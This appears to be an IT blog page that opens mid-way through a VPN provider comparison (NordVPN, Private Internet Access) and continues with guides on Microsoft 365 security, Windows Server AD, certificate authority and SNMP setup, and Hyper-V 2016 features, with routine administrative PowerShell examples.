NordVPN is amongst the top VPN Providers. NordVPN certainly has significant features that will appeal to many of our readers. With more than 720 servers world-wide across 56 countries, it’s hard to overlook this provider.

NordVPN No-Log Policy

NordVPN advertises a No-Log Policy which will certainly attract attention. According to NordVPN, the company doesn’t track any information, thanks to its headquarters being based in Panama, which doesn’t require any data retention or reporting.

NordVPN Performance

While NordVPN didn’t break any records for its download speeds, its upload speeds were exceptional and consistent.

At an average 26Mbps download speed home users can easily download torrents or stream videos without concern.

 NordVPN download, upload and latency tests were great

NordVPN download, upload and latency tests were great

Upload speeds shone at an average of almost 88.5Mbps and, as previously mentioned, they were steady across all tests performed, which is a sign of a stable VPN provider. Upload peaks of 89.52Mbps were nice to see, but we would have preferred seeing them in the download test instead.

Latency was a bit of a concern at 221ms, which means online games that don’t tolerate lag very well might give users a hard time; however, connecting to VPN servers within the user’s country of residence would surely make a difference.

The tests were performed using the OpenVPN UDP protocol. NordVPN offers unlimited downloading, uploading and streaming.

NordVPN Client & Security Features

The NordVPN client is a really nice one, packed with a number of great features that helped it earn its No.4 position in our Best VPN Service comparison. When launched it provides a map of the world allowing you to quickly connect to a server of your choice. Intermediate users can visit the servers tab to obtain a full list of servers or quick shortcuts to categorized servers depending on the application of interest e.g P2P servers, Ultra-fast TV servers, Double VPN servers etc. Security features include Kill Switch, Auto Connect, DNS Leak Protection, Selection of TCP/UDP for VPN connectivity, custom DNS servers and more.

The Kill Switch provides the additional functionality of killing a specific application when the VPN fails – a very handy feature.

 NordVPN VPN Client

NordVPN Client – a VPN client packed with features (click to enlarge)

NordVPN offers support for the Windows platform, MAC, Mobile iOS and of course Android. This means it is capable of covering the majority of devices in the market today. Similar to other VPN Providers, Linux users will have to use the open-source OpenVPN client which is fully compatible with the provider.

NordVPN Supports Netflix VPN Streaming

During our tests we were able to confirm that NordVPN provides support for US-based Netflix. The NordVPN client provides a feature named Smart Play which allows its users to stream Netflix and similar services from anywhere in the world no matter which VPN server they connect to.

We tried this fantastic feature but were disappointed as it didn’t seem to work as advertised. We initially connected to an Australian VPN server and logged in to our US Netflix account, however, when we attempted to stream a movie we were greeted with a familiar error in our browser:

 NordVPN SmartPlay Netflix Error

NordVPN Smart Play feature for Netflix didn’t work for us (click to enlarge)

We then decided to connect to a US-based VPN Server and try to stream Netflix from there – that seemed to work fine, however, we did notice it was taking slightly longer for the video stream to start:

NordVPN Netflix Streaming 

US Netflix HD streaming with NordVPN connected to US VPN Server (click to enlarge)

NordVPN Pricing & Plans

As with all VPN Providers, purchasing a 12 month subscription provides considerable savings. NordVPN pricing at $5.75US/month (based on a yearly subscription) is a great deal and ideal for users with multiple devices since it allows up to an impressive 6 simultaneous VPN logins. The equally impressive 30 day money-back guarantee gives users plenty of time to properly evaluate NordVPN’s service.

Sceptical users can even try NordVPN Free of charge for 3 days without entering any financial details (Visa, Paypal etc) which is a great feature and one you should try if you have the time.

Users who decide to continue using the service can also opt to pay via Bitcoin to further secure their details.

visit best VPN service - NordVPN

 

No.5: Private Internet Access (PIA)

Private Internet Access Best VPN Service

Private Internet Access is a well-known VPN service provider that’s rightly earned its position amongst our best VPN Service Providers. Its huge VPN network, consisting of more than 3270 servers located in 24 countries, means it will be difficult to find a congested server at any time of the day or night. Private Internet Access is the second provider that offers a free SOCKS5 proxy server to its users.

For an extensive review on PIA, including security tests, DNS Leak tests, Torrent Protection, Kill-Switch test, Netflix support and much more, read our Best VPN Review: Private Internet Access (PIA)

Private Internet Access No-Log Policy

Private Internet Access is another VPN Provider that offers a No-Log Policy which means anonymous browsing and user privacy is a top priority here. Users requiring complete anonymity can even use Bitcoin to pay for their subscription in which case the provider won’t store any financial information on your account.

Private Internet Access Performance

Similar to our other tests, we connected to a US-based VPN server via our premium internet connection.

Private Internet Access Download / Upload Speed & Latency Tests

Private Internet Access Download / Upload Speed & Latency Tests

Speed tests showed an average, but acceptable, 23.94Mbps download and an impressive 108.41Mbps upload. Testing different servers yielded similar results; however, these speeds are more than capable of delivering an enjoyable browsing and downloading experience without any interruptions.

The latency test was a big surprise: 168ms – only 2ms faster than StrongVPN. Given most VPN Providers averaged around 200ms, it was nice to see Private Internet Access provide such a fast connection to the other side of the world. Finally, Private Internet Access offers unlimited downloading, uploading and streaming.

Private Internet Access Client & Security Features

Unlike other VPN clients, the Private Internet Access client stays continuously minimized in the task tray. To open the client’s control settings users must right click on the Private Internet Access icon in the task tray and select settings as shown below:

Accessing Private Internet Access VPN client settings 

Accessing Private Internet Access VPN client settings

The VPN client offers a Simple and Advanced mode. Switching between the two is as simple as clicking on the Simple/Advanced toggle button on the bottom left side:

 Private Internet Access VPN client Advanced Mode settings

Private Internet Access VPN client Advanced Mode settings (click to enlarge)

The Private Internet Access client provides a healthy amount of security options and settings. Kill Switch, DNS Leak Protection and IPv6 Leak Protection are all included within the client, plus PIA’s MACE service which blocks ads, trackers and malware while connected to the VPN service. The Region settings on the left allow the user to connect to different VPN Servers, an option also available when right-clicking on the PIA icon in the task tray.

The VPN client also integrates a firewall to help stop incoming connections from reaching your PC or mobile device, adding an additional layer of security.

The Private Internet Access VPN client is built on OpenVPN and provides strong data encryption and authentication but it does not support PPTP or L2TP/IPSec encryption protocols. To connect via PPTP or L2TP/IPSec to a Private Internet Access VPN Server, users must use their device’s (workstation, mobile phone etc) built-in native VPN client which can prove a bit of a tedious task – especially if you’ve never done it before.

Thankfully Private Internet Access provides a well-documented support section to help get users connected with these alternatively supported encryption protocols.

The Private Internet Access VPN client is offered for the Windows, MAC OS, Apple iOS, Android and Linux (Ubuntu) platforms. Users with other Linux-based distributions will have to install and use the native open-source OpenVPN client from openvpn.net.

Private Internet Access also provides support documentation for configuring DD-WRT, Tomato by Shibby and other platforms.

Private Internet Access Supports Netflix VPN Streaming

Surprisingly enough we were able to access our US Netflix account using most of Private Internet Access’s US-based VPN Servers - a pleasant surprise considering they won’t admit US Netflix works from their VPN network!

 US Netflix streaming with Private Internet Access

US Netflix streaming with Private Internet Access (click to enlarge)

Streaming in High Definition (HD) was excellent without any problems. Videos loaded without noticeable delay providing a great experience that would easily satisfy demanding users. We also tried placing some load on our broadband connection by downloading files, however, Private Internet Access’s VPN Server was able to keep pumping traffic to us without an issue.

We should remind our readers that the US Netflix streaming for all VPN Providers was performed from a 20Mbps home broadband connection to help simulate the majority of user environments.

Private Internet Access VPN Router Software & Support

Private Internet Access doesn’t provide any custom Router app, however, it does support and provide detailed step-by-step instructions on how to setup DD-WRT, Tomato routers and PfSense with its network using OpenVPN.

Private Internet Access Pricing & Plans

Private Internet Access provides a generous up to 5 simultaneous VPN logins which is enough to support a laptop computer, desktop workstation and 2-3 mobile devices making it a very attractive and flexible solution.

At just $3.33US/month it is the cheapest VPN Provider in our review and shouldn’t be overlooked. There is a 7 day money-back guarantee, which is enough time to test the service, and it accepts Bitcoin payments for complete anonymity.

Private Internet Access could easily be in the Top 3 Best VPN Service Providers if download speeds were faster.

 

best vpn service comparison
The Best VPN Service Providers. Scroll above for each provider's direct link.

 Summary: Best VPN Service Providers

We hope this extensive comparison of six of the Best VPN Service Providers has provided enough information to help you decide which VPN provider is best for you. As VPN providers upgrade and introduce new features we’ll ensure this VPN Service comparison guide is kept up to date.

The ultimate choice lies with the end customer – you.

How to Protect Your Business with Microsoft 365 Security Tools

Protecting your business with M365 security tools

Businesses of all sizes are increasingly adopting cloud-based platforms like Microsoft 365 to streamline operations, improve collaboration, and increase productivity. However, this newfound reliance on such software solutions makes these businesses prime targets for cybercriminals.

With sensitive data stored and shared across the suite, securing your Microsoft 365 environment is essential to protect your business from potential threats.

Fortunately, Microsoft 365 comes with a robust set of built-in security tools designed to safeguard your organization from cyberattacks, data breaches, and other security incidents.

10 ways to secure your business data with Microsoft 365

Despite these built-in capabilities, we cannot ignore the importance of third-party Microsoft 365 total protection solutions. Without going into too much detail, these solutions enhance the already powerful native security features. But what are those native features?

In this article, we’ll explore the key Microsoft 365 security tools you can use to protect your business.


Key Microsoft 365 Security Tools to Protect Your Business

Microsoft Defender for Office 365

Microsoft 365 Defender

One of the most critical security solutions within the Microsoft 365 ecosystem is Microsoft Defender for Office 365. This tool is specifically designed to protect against email-based threats such as phishing, malware, and ransomware, which are common attack vectors targeting businesses.

Defender for Office 365 leverages real-time threat intelligence to detect and block malicious activity before it reaches your users.

Key features include:


Continue reading

Empowering Users with Cyber Security Awareness Training

Cyber Security Training

Data breaches and cyber threats cast a long shadow over organizations and individuals alike, making the need for robust cyber security measures more pressing than ever. However, the most advanced technology in the world cannot fully protect against cyber risks if the people using it are not aware of the dangers and the best practices for avoiding them.

It is here that cyber security awareness training becomes invaluable, offering a crucial layer of defense by educating and empowering users. This article explores the critical role of cyber security awareness in the modern digital world, highlighting its significance and providing insights on how organizations can cultivate a culture instilled with security consciousness. Join us as we unravel the key components of implementing robust cyber security awareness training to fortify your digital defenses.


What is Cyber Security Awareness?

Cyber Security Awareness training

Cyber security awareness encapsulates the knowledge and behaviors that individuals within an organization adopt to protect its information assets. It's not merely about having the right technology in place; it's about ensuring every member of the organization understands the role they play in maintaining security. This understanding spans recognizing potential threats, such as malware, adhering to IT Security protocols, and adopting best practices to mitigate risks.

Beyond mere compliance, it fosters a proactive mindset that empowers individuals to act decisively and effectively in the face of potential cyber threats, thereby reinforcing the organization's digital defenses.

Why Is Cyber Security Awareness Training Important?

Some of the cyber threats posing risks to organizations are quite sophisticated, ranging from phishing scams to ransomware attacks. Cyber security awareness trains employees to identify and respond to cyber threats effectively. It transforms employees from being the weakest link in the security chain to a robust first line of defense.

By raising awareness and educating staff, organizations can dramatically reduce the likelihood of cyber attacks and data breaches. Now, let’s see why cyber security awareness training is important.

Your Employees Are The First Line of Defense

Employees often inadvertently become conduits for cyber threats. Simple actions, such as responding to phishing emails or utilizing compromised devices, can expose organizations to significant risks. Cyber security awareness training endows employees with the essential critical thinking skills to evaluate suspicious activities and make informed, secure decisions.

Cyber Security Awareness Training and M365

Continue reading

Microsoft 365 Security

Boost Your Microsoft 365 Security with Expert Guidance and Proven Best Practices

Microsoft 365 Security

This article serves as a comprehensive guide to fortifying the security posture of Microsoft 365, covering essential aspects ranging from foundational security principles to advanced strategies for optimizing productivity without compromising security. From introducing the fundamental Microsoft 365 Security Essentials to defining proactive measures such as regular audits, secure configurations, and Data Loss Prevention (DLP) protocols, this guide equips organizations with the knowledge necessary to establish a resilient security framework.

Furthermore, the article delves into protecting user identities and sensitive data through proven strategies such as Multi-Factor Authentication (MFA), identity protection mechanisms, and data encryption techniques. By prioritizing these measures, businesses can mitigate the risk of unauthorized access and data breaches, thereby bolstering trust and compliance with regulatory standards.

Moreover, the article explores how organizations can optimize security measures to enhance productivity, emphasizing the role of role-based access control (RBAC), security awareness training, and the utilization of security dashboards and reports. By integrating security seamlessly into daily workflows, businesses can foster a culture of vigilance while empowering employees to navigate digital environments securely.


Introduction to Microsoft 365 Security Essentials

Continue reading

Windows Server 2022 AD and DNS Deployment

Deploying Active Directory & DNS Services on Windows Server 2022 & Elevating it to Domain Controller Role

intro windows server 2022 ad dns

This article provides a comprehensive guide to deploying Active Directory and DNS Services on Windows Server 2022, encompassing the Essential, Standard, and Datacenter editions. Our guide also includes step-by-step instructions for promoting the Windows server to a Domain Controller (DC). To enhance user experience, we've included plenty of helpful screenshots, ensuring a smooth and uncomplicated installation process.

 


Explore our dedicated section on Windows Servers for a rich collection of articles providing in-depth coverage and insights into various aspects of Windows Server functionality.

Installation of Active Directory and DNS Services

To begin, in Server Manager, select Dashboard from the left pane, then Add roles and features from the right pane:

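For admins who prefer the command line, the same roles can also be added with PowerShell. The sketch below is a minimal example only; the domain name corp.example.local and the use of a single new forest are illustrative assumptions, and Install-ADDSForest will prompt for the DSRM (Safe Mode) password:

# Install the Active Directory Domain Services and DNS Server roles with their management tools
Install-WindowsFeature AD-Domain-Services, DNS -IncludeManagementTools

# Promote the server to a Domain Controller in a new forest (prompts for the DSRM password)
Install-ADDSForest -DomainName "corp.example.local" -InstallDns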

Continue reading


How to Enable ‘Web Server’ Certificate Template Option on Windows Certification Authority (CA) Server

In this article we will show you how to enable the ‘Web Server’ certificate template option on a Windows Certification Authority (Windows CA) Server.  The Web Server option is usually not present in a fresh Windows CA server installation, which can introduce difficulties for users or administrators who need to get their web server certificates signed:

windows ca web server certificate template missing

Recommended Article: How to install and configure a Windows CA Server

Enabling the Web Server certificate template is a simple and non-disruptive process. From the Administrative Tools, open the Certification Authority tool. Next, right-click on the Certificate Templates folder and select Manage:

windows ca certificate templates

This will open the Certificate Templates Console as shown below.  Double-click on the Web Server template:

windows ca certificate templates console

The Web Server Properties window will now appear. Click on the Security tab and select the Authenticated Users from the Group or user names section.  In the Permissions for Authenticated Users section tick the Allow action for the Enroll permission. When ready, click on OK:

windows ca web server properties

Congratulations - you’ve now successfully enabled the Web Server certificate template option. Your Windows CA server should now present the previously missing option as shown below:

windows ca web server certificate template enabled
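As an optional check, the built-in certutil utility can list the certificate templates the CA is currently configured to issue, so you can confirm the Web Server template now appears:

# Run on the CA server - lists the certificate templates the CA will issue
certutil -CATemplates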

Summary

This article explained how to enable the Web Server certificate template option on your Windows Certification Authority (Windows CA) Server. We included step-by-step screenshots to ensure it’s a detailed yet simple process to follow.


How to Install and Configure SNMP for Windows Server 2016

Simple Network Management Protocol (SNMP) is a UDP-based protocol that uses port 161 to monitor and collect detailed information on any network device supporting the SNMP protocol. All Windows servers support SNMP and we’ll show you how to easily install and configure SNMP on your Windows 2016 or 2012 server, including Read Only (RO) or Read Write (RW) SNMP community strings.

In our example we will enable the SNMP agent and configure an SNMP community string to allow our Network Monitoring System (NMS) to monitor our server resources.

Execution Time: 10 minutes

Step 1 – Install SNMP on Windows Server 2016

Open the Control Panel on your Windows Server, double-click on the Programs and Features icon and then select Turn Windows features on or off:

windows server turn features on off

This will open the Add Roles and Features Wizard. Keep clicking on the Next button until you reach the Features section. From there, select the SNMP Service option:

windows server snmp service installation

When prompted, click on the Add Features button to include the installation of the Administration SNMP Tools:

windows server additional snmp tools

Optionally you can include the SNMP WMI Provider option located under the SNMP Service. When ready click on the Next button.

This is the final screen – simply click on the Install button. Ensure the Restart the destination server automatically if required option is not selected:

windows server snmp installation confirmation

The SNMP Service will now be installed on your Windows 2016 Server. This process will require around 3 minutes to complete. When done, click on the Close button to exit the installation wizard:

windows server snmp installation complete
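If you prefer to script the installation, the same result can be achieved with a single PowerShell command; a minimal sketch with the optional WMI provider included:

# Install the SNMP Service, the optional WMI provider and the SNMP management tools
Install-WindowsFeature SNMP-Service, SNMP-WMI-Provider -IncludeManagementTools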

Step 2 – Configure SNMP Service & Read-Only or Read-Write Community String

Configuring the Windows 2016 Server SNMP Service is a simple task. As an administrator, run services.msc or open the Services console from the Administrative Tools. Double-click the SNMP Service and go to the Security tab:

windows server snmp service configuration 1

To add a Read-Only community string, click on the Add button under the Accepted community names section. Enter the desired Community Name and set the Community rights to READ ONLY. When done, click on the Add button:

windows server snmp service configuration 2

Next, in the lower section of the window, click on the Add button and insert the IP address which will be allowed to poll this server via SNMP. This would be the IP address of your Network Monitoring Service. In our environment our NMS is 192.168.5.25. When done, click on Apply then the OK button:

windows server snmp service configuration 3
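For unattended deployments, the same community string and permitted manager can also be written directly to the SNMP registry keys. The sketch below assumes the community name public-ro and the NMS address used in this example; a rights value of 4 corresponds to READ ONLY and 8 to READ WRITE:

# Add a READ ONLY community string (4 = READ ONLY, 8 = READ WRITE)
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities" `
    -Name "public-ro" -PropertyType DWord -Value 4

# Allow our NMS (192.168.5.25) to poll this server; entry "1" is usually localhost
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\PermittedManagers" `
    -Name "2" -PropertyType String -Value "192.168.5.25"

# Restart the SNMP service so the changes take effect
Restart-Service SNMP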

To confirm SNMP is working correctly, we configured our NMS to query and retrieve information from our server every 5 minutes. After a while we were able to see useful information populating our NMS:

windows server snmp resource monitoring

Depending on your Network Monitoring System you'll be able to obtain detailed information on your server's status and state of its resources:

windows server snmp resource monitoring

Summary

This article briefly explained the purpose of SNMP and how it can be used to monitor network devices and collect useful information such as CPU, RAM and Disk usage, processes running, host uptime and much more. We also showed how to install and configure the SNMP Service for Windows Server 2016. For more technical Windows articles, please visit our Windows Server section.


Simple Guide on Installing & Configuring a Windows 2016 Certification Authority Server

windows ca server

A Windows Active Directory Certification Authority server (AD CA), also known as a Certificate Authority, is an essential service to every organization’s Active Directory as it can manage, issue, revoke and renew digital certificates used to verify the identity of users, computers and other network services.

This guide will show you how to quickly install and setup a Certification Authority server on Windows 2016 server. The guide includes the installation of the Certification Authority Web Enrollment service to allow your organization to request, renew and download certificates via a simple web interface.

Execution Time: 10 - 15 minutes

Step 1 – Installation of Windows Active Directory Certificate Services

Launch Server Manager and go to Manage > Add Roles and Features:

windows ca server installation server manager

At the next screen simply click on the Next button:

windows ca server installation add roles features

 Ensure Role-based or feature-based installation is selected and click on Next:

windows ca server installation select destination server

 At the next screen select the destination server from the available Server Pool and click on the Next button:

windows ca server installation select server

Next, tick the Active Directory Certificate Services from the available roles:

windows ca server installation select server role

The Add Roles and Features Wizard will immediately pop up a new window requiring you to confirm the installation of additional tools needed to manage the CA feature. To confirm, click on the Add Features button:

windows ca server installation add additional features

You will now return to the previous window. Simply click on the Next button to continue.

At the Select Features window just click on the Next button:

windows ca server installation select features

The next section is about the Certificate Services we want to install. The initial window warns that the computer/server name cannot be changed after a certification authority (CA) has been installed. Take a moment to read through the information and click on Next when ready:

windows ca server installation ad cs

The next window allows you to select the desired Certification Authority services to be installed. The first one, Certification Authority, is selected by default; however, it is advisable to also select the Certification Authority Web Enrollment feature as it provides a simple web interface from which you can submit certificate signing requests, download certificates and more.

windows ca server installation ad cs services

As soon as the Certification Authority Web Enrollment feature is selected a pop up window will appear requesting confirmation to install additional features needed. Click on Add Features:

windows ca server installation ad cs additional features

You’ll now be returned back to the previous window, click on Next to continue.

The next screen is required for the installation of IIS Web Services. If you already have IIS installed, you won’t need to run through these steps. Click on Next to continue:

windows ca server installation iis web server role

At the next screen, IIS Web Server options, we can easily accept the default selected services. Feel free to scroll down and check the available options otherwise simply click on Next to continue:

windows ca server installation iis web server features

The final window is a simple confirmation of all selected services and features. Note the automatic restart option at the top – it’s advisable not to use it as the Windows Server might restart once installation is complete.

When ready, click on the Install button to begin the installation:

windows ca server installation confirm installation options

Installation can take from 5 to 10 minutes depending on how busy the server is. Once complete it is necessary to configure Active Directory Certificate Services on the destination server by clicking on the link provided at the end of the installation wizard:

windows ca server installation progress
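The same roles can alternatively be installed from PowerShell. A minimal sketch covering the Certification Authority and Web Enrollment role services used in this guide (required dependencies such as IIS are added automatically):

# Install the Certification Authority and Web Enrollment role services with their management tools
Install-WindowsFeature ADCS-Cert-Authority, ADCS-Web-Enrollment -IncludeManagementTools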

Step 2 - Configuring Active Directory Certificate Services (AD CS)

Configuring Active Directory Certificate Services is a simple and quick process. You can initiate this process from the previous step or from the Server Manager Dashboard by clicking on the exclamation mark and selecting Configure Active Directory Certificate Services on the destination server:

windows ca server installation configuring ca

Once the configuration process is initiated, the system will require credential confirmation to install the necessary role services. Enter a username that belongs to the local Administrators and Enterprise Admins groups. By default the Administrator username will appear. When ready click on Next:

windows ca server configuration credentials

Next, select the Role Services to be configured. The two services available for us are Certification Authority and Certification Authority Web Enrollment. Select them both and click on Next:

windows ca server configuration role services

At the next screen select Enterprise CA (default) as CA setup type and click on Next:

windows ca server configuration setup type

Next, assuming this is the first and possibly only CA in your organisation, select Root CA (default) as the type of CA and click on Next:

windows ca server configuration ca type

Next, we will create a new private key (default option) and click on Next to configure its options:

windows ca server configuration private key

On the next screen we can leave all options to their default settings and continue. Alternatively a different hash algorithm can be selected e.g SHA384 or SHA512 with a larger Key Length. When ready, click on Next:

windows ca server configuration ca cryptography

Here we can change or leave the suggested Common Name (CN) for our Certification Authority (CA). When ready, click on Next:

windows ca server configuration ca name

The Validity Period determines how long the certificate generated for our CA will be valid. By default this is 5 years, however it can be adjusted either way. Enter the desired number of years and click on Next:

windows ca server configuration certificate validity period

Last option is the configuration of the database locations. Accept the default locations and click on Next:

windows ca server configuration database location

Finally, we are presented with a confirmation window with all settings. This is the last chance to change any settings or values. When ready, click on Configure:

windows ca server configuration confirmation of settings

After a few seconds the Results window will appear confirming all roles, services and features have been successfully configured.  Click on Close to exit the configuration wizard:

windows ca server configuration complete
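For reference, the same configuration can be scripted with the ADCSDeployment PowerShell cmdlets. The sketch below mirrors the defaults chosen in this guide (Enterprise Root CA, SHA256, 2048-bit key, 5-year validity) and should be adjusted to your environment:

# Configure an Enterprise Root CA matching the wizard defaults used above
Install-AdcsCertificationAuthority -CAType EnterpriseRootCA `
    -HashAlgorithmName SHA256 -KeyLength 2048 `
    -ValidityPeriod Years -ValidityPeriodUnits 5

# Configure the Certification Authority Web Enrollment component
Install-AdcsWebEnrollment -Confirm:$false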

We’ll now find the Certificate Authority MMC available in the Administrative Tools:

windows ca server mmc console

We can also visit the CA Server’s web site to request and download signed certificates by visiting the URL:  http://<server IP>/certsrv e.g http://192.168.1.10/certsrv:

windows ca server webserver access

Summary

This article explained the role and importance of a Windows Certificate Authority Server and provided a step-by-step guide on how to install and configure a Windows 2016 Certification Authority Server, including the Certification Authority Web Enrollment component.


Download Altaro Free VM Backup & Win a PlayStation 4 Pro, Xbox One X, 3-Year Amazon Prime and more!

We have some exciting news for you today!

Altaro has launched a great contest in celebration of SysAdmin Day on 27th July!

They will be giving away Amazon eGift Cards to the first 100 eligible entries and 1 Grand Prize to 1 lucky winner.

The Grand Prize winner will be able to choose any prize from the following: a PlayStation 4 Pro, Xbox One X, a 3-year membership of Amazon Prime, an Unlimited Plus Edition of Altaro VM Backup, and more!

All contest participants will even get FOREVER FREE backup for 2 VMs when they download Altaro VM Backup!

altaro 2018 syadmin day - Free Grand Prizes

Want to WIN?

Here’s what you need to do:

  1. Download Altaro VM Backup from https://goo.gl/Zvedfs using a valid work email address
  2. Set up a virtual machine on Altaro VM Backup and take a screenshot. Only screenshots that show at least 1 VM added for backing up will be considered as eligible.
  3. Upload the screenshot and the Grand Prize choice at the link you will receive via email once you download Altaro VM Backup from the contest landing page.

Good luck!


Free Webinar: Migrating from Hyper-V to VMware

hyper-v vmware migration webinar

If your organization is planning to migrate from a Hyper-V virtualization environment to VMware then this FREE webinar is just for you.

Aimed toward Hyper-V and VMware admins this webinar will cover critical topics such as:

  • vSphere basics and a crash course in HA, DRS, and vMotion
  • Management differences between vSphere and Hyper-V
  • How to migrate VMs from Hyper-V to VMware using the VMware vSphere Converter

The entire session will be geared towards Hyper-V admins who are looking to broaden their horizons by adding VMware know-how to their toolbox.

Webinar Date: Tuesday, June 27th 2017 - Click here to join.

Time: 10am PDT / 1pm EDT (US attendees), 2pm CEST (EU attendees)

While the event date has passed, it has been recorded and is available for viewing. All materials are available as direct downloads. Click here to access the event.


Guide to Windows Server 2016 Hyper-V Hypervisor: New Virtualization Features, Limitations, Backup, Checkpoints, Storage, Networking and more

Guide to Hyper-V Windows server 2016

One of Windows Server 2016’s highlights is the newer Hyper-V server that not only extends the hypervisor’s features and capabilities but also introduces a number of new enhancements and concepts that take virtualization to a new level.

There are a lot of exciting new features to cover, so without any further delay, let’s take a look at what we have in hand for you:

Users new to Hyper-V can also read our Introduction to Hyper-V Concepts article

Hyper-V Hypervisor Technology Overview

Hyper-V was first released in 2008 as the successor to Microsoft’s earlier Virtual PC and Virtual Server products. It lets users create a virtual machine (VM), a complete, software version of a computer. Users don’t have to install an OS through the normal route, and can instead run it on top of their current one.

This is made possible by a hypervisor – a layer between the physical and virtual environments that can manage the system’s hardware between VMs. It isolates the host machine from its underlying hardware.

This opens some natural benefits. Firstly, a virtual machine is in a separate environment to the host computer. As a result, any problems that occur do not affect the regular operating system. This makes virtual machines ideal testing environments.

This is furthered by the ability to run multiple operating systems at once. Most modern computers have more hardware than needed for day to day tasks, and users can run, for example, a Windows, Windows Server, and Linux operating system simultaneously. Instead of requiring three different servers, only one is required. This cuts down on hardware, power, maintenance, and cooling costs.

It also allows for more flexible deployment. At a hefty fee, admins can purchase a Windows Datacenter license and create unlimited virtual machines without having to pay any extra. In testing or production environments, this removes the delays caused by checking and purchasing licenses. With virtualization, new servers can be deployed in minutes.

Another flexibility is hardware resources. Users can configure Hyper-V to utilize different amounts of resources, including the processor, storage, and memory. This is particularly useful if an organization uses a Virtual Desktop Infrastructure (VDI). A Windows operating system is hosted on a central server, and users are given virtual desktops over the network. Not only does this save on licensing costs, it means admins can scale the amount of resources users have depending on various factors.

Hyper-V also lets admins make easy backups. It’s simple to copy a VM and restore it later if anything goes wrong. With Hyper-V, there are two options – saved states, and Volume Shadow Copy Service (VSS). VSS lets admins make backups even when files are in use, meaning the process can be completed on demand.

This ease of movement can be useful in other scenarios. Built-in features like live and storage migration make virtual machines much more portable. Users can access the exact same environment on a different machine, without the need for complex procedures. That combines with security features like Secure Boot to protect the host OS from viruses, malware, and attacks.


Hyper-V in Windows Server 2016

One of the most popular hosts for a virtual machine is Microsoft’s Windows Server OS. For the past few years, admins have been running Windows Server 2012 R2, a Windows 8.1-based platform. However, the release of Windows 10 has prompted a Windows Server 2016 variant, and it comes with plenty of new functionality.

A big example is the introduction of Microsoft’s Nano Server. A purpose-built OS, Nano Server is a lightweight version of Windows Server Core that’s designed to run born-in-the-cloud applications and containers. It’s complementary to Windows Server 2016, has no GUI, and is optimized for Hyper-V. The service provides an environment with a low overhead and fewer avenues of attack.

Windows Server 2016 also introduces nested virtualization. Essentially, this lets you run a VM inside another VM. Though it’s a strange concept, the usage scenarios are more common than you may think. Many companies now use the virtual infrastructure we mentioned earlier, and this means those systems can still use Hyper-V. It also makes for a good test environment, letting trainees try out different OSs and situations without the need for separate hardware.
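Nested virtualization is enabled per virtual machine while it is powered off. A minimal sketch using the Hyper-V PowerShell module is shown below; the VM name is just an example:

# Expose the virtualization extensions of the host CPU to the guest (VM must be off)
Stop-VM -Name "LabVM"
Set-VMProcessor -VMName "LabVM" -ExposeVirtualizationExtensions $true
Start-VM -Name "LabVM"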

Other big improvements come to the Hyper-V manager. An updated WS-MAN management protocol lets admins do a live migration without having to enable extra settings in Active Directory. This also enables CredSSP, Kerberos or NTLM authentication, and makes it easy to enable a host for remote management.

This is furthered by support for alternate credentials when connecting to another Windows 10 or 2016 remote host. This includes a save functionality so that you don’t have to type it every time. Though earlier versions don’t support this functionality, you can still use the Hyper-V manager in Windows Server 2016 to control earlier versions. The new manager supports Windows Server 2012, 2012 R2, Windows 8, and 8.1.

The next major change is PowerShell Direct. The connection runs directly between the host and virtual machine, meaning there’s less need to configure firewalls and networks. It lets users remotely run cmdlets in multiple VMs without complex setup. PowerShell functionality also extends to Nano Server, where it can run directly.
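A quick illustration of PowerShell Direct is shown below; the VM name and credentials are placeholders, and the commands are run from the Hyper-V host itself:

# Open an interactive session to a running VM - no network or firewall configuration required
Enter-PSSession -VMName "LabVM" -Credential (Get-Credential)

# Or run a command non-interactively inside the guest
Invoke-Command -VMName "LabVM" -Credential (Get-Credential) -ScriptBlock { Get-Service | Where-Object Status -eq 'Running' }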

Hyper-V Containers

It’s no secret that containers are on the rise, and are becoming increasingly common in production scenarios. With Windows Server 2016, Microsoft has introduced Windows and Hyper-V Containers for the first time.

For those unfamiliar, containers let users create an isolated environment in which to run an application. The environment lets an app run without affecting the rest of the system, and vice versa. In comparison to a VM, they’re more lightweight and don’t emulate hardware in the same way.

hyper-v containers

Traditionally, containers were limited to Linux OSs. Through a collaboration with Docker, Windows Server 2016 now offers two types of containers.

  • A Windows Server Container uses namespace and isolation technology, but shares a kernel with the container host and all other running containers.
  • A Hyper-V container instead runs each container in an optimized VM. In this case, the kernel isn’t shared with the host, or other containers.

Windows Containers have several important features, including HTTPS support, data management through container shared folders, and the ability to restrict container resources.

Hyper-V Security Features

Hyper-V on Windows Server 2016 also comes with new security features. The first is the ability to use Secure Boot with Linux VMs. This feature was previously restricted to Windows 8 and Server 2012, and checks the signature of boot software on launch to prevent malware and unauthorized OSs launching during start up.
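For Linux guests, Secure Boot is switched to the Microsoft UEFI Certificate Authority template. A minimal sketch, assuming a Generation 2 VM with an example name:

# Enable Secure Boot for a Linux guest using the UEFI CA template
Set-VMFirmware -VMName "UbuntuVM" -EnableSecureBoot On -SecureBootTemplate MicrosoftUEFICertificateAuthority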

Host resource protection also has some security and stability improvements. It stops VMs from hogging system resources by monitoring activity and downgrading VMs with excessive usage. It can be enabled through PowerShell and prevents performance degradation with the host or other machines.
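Host resource protection is off by default and is toggled per VM; a one-line sketch with an example VM name:

# Prevent this VM from monopolising host resources
Set-VMProcessor -VMName "LabVM" -EnableHostResourceProtection $true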

Shielded virtual machines provide further protection. In essence, they provide a stronger barrier against spying by administrators and malware. Encryption is applied to the state and data, meaning admins can’t see the activities or intercept information. This combines with further encryption options for operating system disks on generation 1 virtual machines. Users can utilize BitLocker to do this, creating a small drive that contains the encryption key. To start the machine, hosts need either access to the private key or to be part of an authorized guarded fabric.

Generation 2 Virtual Machines, Performance and Features

Generation 2 VMs have some new features, too. Namely, they can use a lot more memory and virtual processors. Gen 2 supports up to 12 TB of virtual memory versus the previous 1 TB, and up to 24 TB per physical host server. It also supports 240 Virtual Processors instead of 64, and 512 logical processors rather than 320.

The result is a huge increase in performance, suitable for large-scale online transaction processing and data warehousing. Microsoft benchmarks reveal up to 343,000 transactions per second with a 4 TB in-memory database and 128 virtual processors. That’s 95% of a physical server’s performance.

hyper-v gen2 vm hardware

Figure 2. Physical server vs. Hyper-V performance

